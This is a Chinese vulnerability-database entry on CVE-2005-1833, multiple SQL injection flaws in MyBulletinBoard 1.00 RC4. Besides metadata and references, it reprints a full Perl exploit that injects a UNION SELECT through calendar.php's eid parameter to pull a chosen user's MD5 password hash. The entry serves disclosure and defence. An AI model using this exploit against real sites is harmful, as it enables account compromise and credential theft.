MyBulletinBoard (MyBB) 1.00 RC4多个SQL注入漏洞-安全小百科

MyBulletinBoard (MyBB) 1.00 RC4多个SQL注入漏洞

漏洞ID	1108828	漏洞类型	SQL注入
发布时间	2005-05-31	更新时间	2005-05-31
CVE编号	CVE-2005-1833	CNNVD-ID	CNNVD-200505-1237
漏洞平台	PHP	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/1022
https://www.securityfocus.com/bid/89186
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1237

|漏洞详情

MyBulletinBoard(MyBB)1.00RC4存在多个SQL注入漏洞，远程攻击者可以通过(1)传给calendar.php的eid参数，(2)传给online.php的idsql参数，(3)传给memberlist.php的usersearch参数，(4)传给editpost.php的pid参数，(5)传给forumdisplay.php的fid参数，(6)传给newreply.php的tid参数，(7)传给search.php的sid参数，传给showthread.php的(8)tid或(9)pid参数，(10)传给usercp2.php的tid参数，(11)传给printthread.php的tid参数，或者(12)传给reputation.php的pid参数，来执行任意SQL命令。

|漏洞EXP

#!/usr/bin/perl -w
#
# SQL Injection Exploit for MyBulletinBoard (MyBB) <= 1.00 RC4
# This exploit show the MD5 crypted password of the user id you've chose
# Related advisory: 
# Patch: http://www.mybboard.com/community/showthread.php?tid=2559
# http://fain182.badroot.org
# http://www.codebug.org
# Discovered by Alberto Trivero and coded with FAiN182

use LWP::Simple;

print "nt===========================================n";
print "t= Exploit for MyBulletinBoard <= 1.00 RC4 =n";
print "t= Alberto Trivero & FAiN182 - codebug.org =n";
print "t===========================================nn";

if(!$ARGV[0] or !$ARGV[1]) {
   print "Usage:nperl $0 [full_target_path] [user_id]nnExample:nperl $0 http://www.example.com/mybb/ 1n";
   exit(0);
}

$url = "calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users%20WHERE%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]n";
$page =~ m/<td><strong>(.*?)</strong>/ && print "[+] User ID is: $1n";
print "[-] Unable to retrieve User IDn" if(!$1);
$page =~ m/<a href="member.php?action=profile&uid=">(.*?)</a>/ && print "[+] MD5 hash of password is: $1n";
print "[-] Unable to retrieve hash of passwordn" if(!$1);

# milw0rm.com [2005-05-31]

|受影响的产品

MyBulletinBoard MyBulletinBoard 1.00 Rc4

|参考资料

来源:www.mybboard.com
链接:http://www.mybboard.com/community/showthread.php?tid=2559
来源:SECUNIA
名称:15552
链接:http://secunia.com/advisories/15552
来源:BUGTRAQ
名称:20050531MultiplevulnerabilitiesinMyBulletinBoard(MyBB)1.00RC4
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111757191118050&w;=2
来源:OSVDB
名称:17024
链接:http://www.osvdb.org/17024

相关推荐: Microsoft Internet Explorer 6 – Absolute Position Block Denial of Service

Microsoft Internet Explorer 6 – Absolute Position Block Denial of Service 漏洞ID 1054210 漏洞类型发布时间 2003-10-03 更新时间 2003-10-03 CVE编号 …

文章版权归作者所有，未经允许请勿转载。

THE END